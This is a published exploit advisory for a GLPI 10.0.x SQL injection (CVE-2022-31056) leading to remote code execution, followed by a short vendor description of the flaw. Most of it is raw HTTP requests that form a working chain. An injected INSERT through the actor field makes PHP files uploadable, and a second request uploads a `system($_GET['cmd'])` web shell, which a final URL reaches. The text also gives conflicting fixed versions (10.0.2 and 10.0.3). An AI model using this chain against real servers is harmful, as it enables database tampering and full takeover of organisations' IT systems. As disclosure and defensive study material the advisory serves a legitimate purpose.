Headline
GLPI 10.0.2 SQL Injection / Remote Code Execution
GLPI versions 10.0.0 through 10.0.2 suffer from a remote SQL injection vulnerability that can lead to remote code execution.
# ADVISORY INFORMATION# Exploit Title: GLPI v10.0.2 - SQL Injection (Authentication Depends on Configuration)# Date of found: 11 Jun 2022# Application: GLPI >=10.0.0, < 10.0.3# Author: Nuri Çilengir # Vendor Homepage: https://glpi-project.org/# Software Link: https://github.com/glpi-project/glpi# Advisory: https://pentest.blog/advisory-glpi-service-management-software-sql-injection-remote-code-execution-and-local-file-inclusion/# Tested on: Ubuntu 22.04# CVE: CVE-2022-31056# PoCPOST /front/change.form.php HTTP/1.1Host: acme.comUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:100.0) Gecko/20100101 Firefox/100.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Content-Type: multipart/form-data; boundary=---------------------------190705055020145329172298897156Content-Length: 4836Cookie: glpi_8ac3914e6055f1dc4d1023c9bbf5ce82_rememberme=%5B2%2C%22wSQx0155YofQn53WMozDGuSI1p2KAzxZ392stmrX%22%5D; glpi_8ac3914e6055f1dc4d1023c9bbf5ce82=f3cciacap6rqs2bcoaio5lmikg-----------------------------190705055020145329172298897156Content-Disposition: form-data; name="id"0-----------------------------190705055020145329172298897156Content-Disposition: form-data; name="_glpi_csrf_token"752d2ff606bf360d809b682f0d9da9c23b290b31453f493f4924e16e77bbba35-----------------------------190705055020145329172298897156Content-Disposition: form-data; name="_actors"{"requester":[],"observer":[],"assign":[{"itemtype":"User","items_id":"2','2',); INSERT INTO `glpi_documenttypes` (`name`, `ext`, `icon`, `mime`, `is_uploadable`) VALUES('PHP', 'php', 'jpg-dist.png', 'application/x-php', 1); ---'","use_notification":"1","alternative_email":""}]}-----------------------------190705055020145329172298897156--If you manipulate the filename uploaded to the system, the file is placed under /files/_tmp/. HTTP GET request required to trigger the issue is as follows.POST /ajax/fileupload.php HTTP/1.1Host: 192.168.56.113User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:100.0) Gecko/20100101 Firefox/100.0Accept: application/json, text/javascript, */*; q=0.01Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateX-Glpi-Csrf-Token: bb1c7f6cd4c1865838b234b4f703172a57c19c276d11eb322936d770d75c6dd7X-Requested-With: XMLHttpRequestContent-Type: multipart/form-data; boundary=---------------------------102822935214007887302871396841Content-Length: 559Origin: http://acme.comCookie: glpi_8ac3914e6055f1dc4d1023c9bbf5ce82_rememberme=%5B2%2C%22wSQx0155YofQn53WMozDGuSI1p2KAzxZ392stmrX%22%5D; glpi_8ac3914e6055f1dc4d1023c9bbf5ce82=f3cciacap6rqs2bcoaio5lmikg-----------------------------102822935214007887302871396841Content-Disposition: form-data; name="name"_uploader_filename-----------------------------102822935214007887302871396841Content-Disposition: form-data; name="showfilesize"1-----------------------------102822935214007887302871396841Content-Disposition: form-data; name="_uploader_filename[]"; filename="test.php"Content-Type: application/x-phpOutput: <?php echo system($_GET['cmd']); ?>-----------------------------102822935214007887302871396841--# POC URLhttp://192.168.56.113/files/_tmp/poc.php?cmd=Related news
CVE-2022-31056
GLPI is a Free Asset and IT Management Software package, Data center management, ITIL Service Desk, licenses tracking and software auditing. In affected versions all assistance forms (Ticket/Change/Problem) permit sql injection on the actor fields. This issue has been resolved in version 10.0.2 and all affected users are advised to upgrade.